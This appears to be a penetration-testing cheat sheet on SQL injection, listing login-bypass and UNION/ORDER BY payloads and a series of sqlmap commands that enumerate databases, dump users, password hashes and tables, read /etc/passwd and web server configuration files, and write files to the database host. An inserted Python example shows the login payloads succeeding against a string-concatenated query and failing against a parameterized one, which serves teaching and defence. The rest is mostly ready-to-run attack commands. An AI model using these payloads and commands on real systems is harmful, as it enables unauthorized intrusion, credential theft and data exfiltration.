# Simple SQL Injection Payloads for Testing
```bash
#Example SQLi payloads
admin'
admin'-- -
admin' OR 1=1
admin' OR 1=1-- -
#Example UNION payloads
test' UNION SELECT 1,2;-- - #suss out number of columns
test' UNION SELECT 1,2,2,3,4,5,6;-- -
test' UNION SELECT 1,@@version,2,3,4,5,6;-- - #once we determine the number of columns, determine the injectable column
test' ORDER BY 1-- #suss out number of columns
test' ORDER BY 2--
test' ORDER BY 3--
```
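Why the login payloads above behave differently against a query built by string concatenation and one that binds parameters, shown as an added example that is not part of the original page. The `users` table, its contents, and the function names are constructed for illustration, and SQLite stands in for the MySQL/MSSQL back ends the page targets so the block runs offline.

```python
import sqlite3

# Constructed sample data: a single user in an in-memory SQLite database.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concat(db, username, password):
    """Vulnerable: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # An unbalanced quote breaks the statement; the error shows that
        # input reaches the SQL parser.
        return "sql-error"

def login_param(db, username, password):
    """Hardened: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def compare(payloads):
    """Map each payload to (concatenated result, parameterized result)."""
    db = make_db()
    return {p: (login_concat(db, p, "wrong"), login_param(db, p, "wrong"))
            for p in payloads}

# The four login payloads listed in the block above.
PAYLOADS = ["admin'", "admin'-- -", "admin' OR 1=1", "admin' OR 1=1-- -"]

if __name__ == "__main__":
    for payload, (vuln, safe) in compare(PAYLOADS).items():
        print(f"{payload!r:24} concatenated={vuln!s:10} parameterized={safe}")
```

The two payloads ending in `-- -` log in through the concatenated query with a wrong password because the comment removes the password check; the parameterized query rejects all four.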
---
# Enumeration with `sqlmap`
## HTTP GET Requests
```bash
sqlmap -u 'http://www.example.com/' --data 'uid=1&name=test' --batch
```
- Once we know which parameter is injectable, we can specify the injection point for efficiency
```bash
sqlmap -u 'http://www.example.com/' --data 'uid=1*&name=test' --batch
```
## HTTP POST Requests
- Copy POST request to file using `burp` or Mozilla dev tools
```bash
sqlmap -r request.txt --batch --force-ssl
```
## Enumerate current db and user info
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --privileges --current-db --is-dba --banner --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --users --passwords
```
## Attempt to read critical files
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd --batch #output may be in HEX
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/apache2.conf --batch #Debian installs
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/sites-available/000-default.conf --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/nginx.conf --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/sites-enabled/default --batch
sqlmap -r request.txt --force-ssl --dbms=mssql --technique=S --risk=3 --level=5 --file-read='C:\inetpub\wwwroot\web.config' #quote the path so the shell keeps the backslashes
```
## Enumerate common files to read
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --common-files --batch
```
## Attempt to write files
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-write=/local/path --file-dest=/remote/path --batch #--file-write is the local source file, --file-dest is the absolute path on the DBMS host
```
## Enumerate dbs & schema
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --schema --batch
```
## Enumerate tables & columns
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB --tables --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --columns --batch
```
## Dump tables
```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --dump --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE -C user,password --dump --batch
```